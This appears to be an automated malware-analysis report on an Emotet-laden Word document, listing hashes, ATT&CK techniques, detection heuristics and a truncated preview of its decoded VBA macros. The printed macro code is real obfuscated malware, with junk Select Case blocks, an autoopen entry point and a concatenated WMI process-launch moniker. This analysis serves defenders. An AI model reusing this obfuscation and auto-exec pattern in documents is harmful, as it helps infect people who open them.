Emotet Office (OLE) malware analysis — malicious · ca20d2a716b4f8a6

MALICIOUS

Office (OLE)

158.8 KB Created: 2019-05-02 13:11:00 Authoring application: Microsoft Office Word First seen: 2019-06-27

MD5: 01e4da496f74f1fa05185ea40952de99 SHA-1: 8cc858f31a74297890143e346fb0355ec9879de9 SHA-256: ca20d2a716b4f8a6f33a2817ea8dce45a08cf19883ad41b221fb2b12b75cceeb

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains legacy WordBasic auto-exec markers and VBA macros, specifically an AutoOpen macro. Critical heuristics indicate the use of GetObject and WMI to launch a process, a common technique for Emotet. The ClamAV signature also explicitly identifies it as Emotet.

Heuristics 7

ClamAV: Doc.Malware.Emotet-6960319-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emotet-6960319-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27709 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	27709 bytes
SHA-256: `e0c2b71cf4b4086de0fd35eb8aab44f5184edbf4997afb361dcb23f6510110ec`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "i_7_49" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "W452789" Attribute VB_Base = "0{26B1CED9-294D-4291-96ED-B3DA0540AACB}{1BEB1573-C98A-42BD-9D5A-463FD125D331}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "w5417665" Attribute VB_Name = "P71257" Attribute VB_Base = "0{7CF31FA9-AE4B-427D-B00C-EBD14E5E8970}{60A09B9E-71C1-4118-9058-BC529E75E6FB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "w_8365_6" Function k45__2(V4_600) Select Case N37503 Case o98_12 = F5_979 = Sgn(915663398) Case R46_782 = U8499112 Case Y613_6 = Log(s3964_17) Case J31742 = CBool(770043342) Case O8095892 = 948052885 Case Z64_45 = CDate(Q49329_9) End Select Select Case i3872843 Case v7__1366 = K865519 = Sgn(219551326) Case n035125 = i5451_5 Case K85848 = Log(l3210249) Case S7_001 = CBool(993609842) Case u456_2 = 541530122 Case I16601 = CDate(S584_7) End Select Set k45__2 = CVar(V4_600) Select Case O68469 Case j4_18073 = z961953_ = Sgn(260716006) Case f642160 = W24996 Case S449731 = Log(N931660) Case m80858 = CBool(34746207) Case t694450 = 596061870 Case w133453 = CDate(z0756884) End Select Select Case D6917810 Case P00_173 = w4660_1 = Sgn(182749233) Case r31422 = A79538 Case l30051__ = Log(i_01765) Case N379985 = CBool(173061214) Case Z2950394 = 759976378 Case O2_6754_ = CDate(B73092) End Select End Function Sub autoopen() Select Case s_8_45_3 Case f6028821 = T78_36 = Sgn(89678378) Case b67158_4 = o1776794 Case s97216 = Log(l904537) Case V5595338 = CBool(147661988) Case H4530329 = 941363160 Case v5771_ = CDate(R_27500) End Select Select Case B46719 Case B902772 = c1031__2 = Sgn(583902484) Case i13034 = T23150_ Case N650_80 = Log(p_4766_7) Case b_03_669 = CBool(361303888) Case W296015 = 171051730 Case U266930 = CDate(E9018653) End Select Select Case T145343 Case R655895 = p086_2 = Sgn(21578397) Case I7101639 = p_0264_6 Case W1992260 = Log(J41512) Case Y030385 = CBool(302452967) Case L2_70552 = 810010039 Case v15_675_ = CDate(S16138) End Select Call F7_2116 Select Case p90899 Case I28781_ = P848_25 = Sgn(379163554) Case b6364785 = m44227 Case B877458 = Log(V07546) Case A_85__ = CBool(546830911) Case f_4274 = 339284241 Case h4_2005 = CDate(i28506) End Select Select Case t_6993 Case q4392_ = w8_2274 = Sgn(35180138) Case f55071 = z64247_ Case N64_187 = Log(O_03856) Case q8_92_7 = CBool(4062587) Case r45253 = 17643203 Case F7898_9_ = CDate(r078_215) End Select Select Case z73643 Case G38789 = n2_8048 = Sgn(882778830) Case E030459_ = M4948_2 Case a62_24 = Log(n38_45) Case l03_49 = CBool(663889470) Case G647__24 = 608058999 Case z01774 = CDate(J80023_1) End Select End Sub Attribute VB_Name = "W136440" Function F7_2116() On Error Resume Next Select Case F86813 Case B0587_35 = f63365_ = Sgn(280587394) Case H320_130 = K513_37 Case H576021 = Log(J1997479) Case k795156 = CBool(185070932) Case N30796 = 418098894 Case M8014848 = CDate(m826_8_5) End Select Select Case P_557_ Case H343062 = F758_627 = Sgn(487222661) Case z90_322 = T24537 Case I_5793 = Log(D44540) Case D74541 = CBool(798423184) Case I4_316 = 335236939 Case W7613608 = CDate(m7_71347) End Select Set M_375173 = k45__2(GetObject("wi" _ + "nmg" + "mts:W" _ + "in32_P" + "rocess" _ + "Sta" + "rtup")) Select Case M50341 Case U21241_8 = I25938 = Sgn(64998561) Case z97864 = j30_438 Case q609925 = Log(a05332) Case S2067906 = CBool(33 ... (truncated)

SHA-256: e0c2b71cf4b4086de0fd35eb8aab44f5184edbf4997afb361dcb23f6510110ec

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "i_7_49"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "W452789"
Attribute VB_Base = "0{26B1CED9-294D-4291-96ED-B3DA0540AACB}{1BEB1573-C98A-42BD-9D5A-463FD125D331}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "w5417665"

Attribute VB_Name = "P71257"
Attribute VB_Base = "0{7CF31FA9-AE4B-427D-B00C-EBD14E5E8970}{60A09B9E-71C1-4118-9058-BC529E75E6FB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "w_8365_6"
Function k45__2(V4_600)
   Select Case N37503
Case o98_12 = F5_979 = Sgn(915663398)
Case R46_782 = U8499112
Case Y613_6 = Log(s3964_17)
Case J31742 = CBool(770043342)
Case O8095892 = 948052885
Case Z64_45 = CDate(Q49329_9)
End Select
   Select Case i3872843
Case v7__1366 = K865519 = Sgn(219551326)
Case n035125 = i5451_5
Case K85848 = Log(l3210249)
Case S7_001 = CBool(993609842)
Case u456_2 = 541530122
Case I16601 = CDate(S584_7)
End Select
Set k45__2 = CVar(V4_600)
   Select Case O68469
Case j4_18073 = z961953_ = Sgn(260716006)
Case f642160 = W24996
Case S449731 = Log(N931660)
Case m80858 = CBool(34746207)
Case t694450 = 596061870
Case w133453 = CDate(z0756884)
End Select
   Select Case D6917810
Case P00_173 = w4660_1 = Sgn(182749233)
Case r31422 = A79538
Case l30051__ = Log(i_01765)
Case N379985 = CBool(173061214)
Case Z2950394 = 759976378
Case O2_6754_ = CDate(B73092)
End Select
End Function
Sub autoopen()
   Select Case s_8_45_3
Case f6028821 = T78_36 = Sgn(89678378)
Case b67158_4 = o1776794
Case s97216 = Log(l904537)
Case V5595338 = CBool(147661988)
Case H4530329 = 941363160
Case v5771_ = CDate(R_27500)
End Select
   Select Case B46719
Case B902772 = c1031__2 = Sgn(583902484)
Case i13034 = T23150_
Case N650_80 = Log(p_4766_7)
Case b_03_669 = CBool(361303888)
Case W296015 = 171051730
Case U266930 = CDate(E9018653)
End Select
   Select Case T145343
Case R655895 = p086_2 = Sgn(21578397)
Case I7101639 = p_0264_6
Case W1992260 = Log(J41512)
Case Y030385 = CBool(302452967)
Case L2_70552 = 810010039
Case v15_675_ = CDate(S16138)
End Select
Call F7_2116
   Select Case p90899
Case I28781_ = P848_25 = Sgn(379163554)
Case b6364785 = m44227
Case B877458 = Log(V07546)
Case A_85__ = CBool(546830911)
Case f_4274 = 339284241
Case h4_2005 = CDate(i28506)
End Select
   Select Case t_6993
Case q4392_ = w8_2274 = Sgn(35180138)
Case f55071 = z64247_
Case N64_187 = Log(O_03856)
Case q8_92_7 = CBool(4062587)
Case r45253 = 17643203
Case F7898_9_ = CDate(r078_215)
End Select
   Select Case z73643
Case G38789 = n2_8048 = Sgn(882778830)
Case E030459_ = M4948_2
Case a62_24 = Log(n38_45)
Case l03_49 = CBool(663889470)
Case G647__24 = 608058999
Case z01774 = CDate(J80023_1)
End Select
End Sub

Attribute VB_Name = "W136440"
Function F7_2116()
On Error Resume Next
   Select Case F86813
Case B0587_35 = f63365_ = Sgn(280587394)
Case H320_130 = K513_37
Case H576021 = Log(J1997479)
Case k795156 = CBool(185070932)
Case N30796 = 418098894
Case M8014848 = CDate(m826_8_5)
End Select
   Select Case P_557_
Case H343062 = F758_627 = Sgn(487222661)
Case z90_322 = T24537
Case I_5793 = Log(D44540)
Case D74541 = CBool(798423184)
Case I4_316 = 335236939
Case W7613608 = CDate(m7_71347)
End Select
Set M_375173 = k45__2(GetObject("wi" _
+ "nmg" + "mts:W" _
+ "in32_P" + "rocess" _
+ "Sta" + "rtup"))
   Select Case M50341
Case U21241_8 = I25938 = Sgn(64998561)
Case z97864 = j30_438
Case q609925 = Log(a05332)
Case S2067906 = CBool(33
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.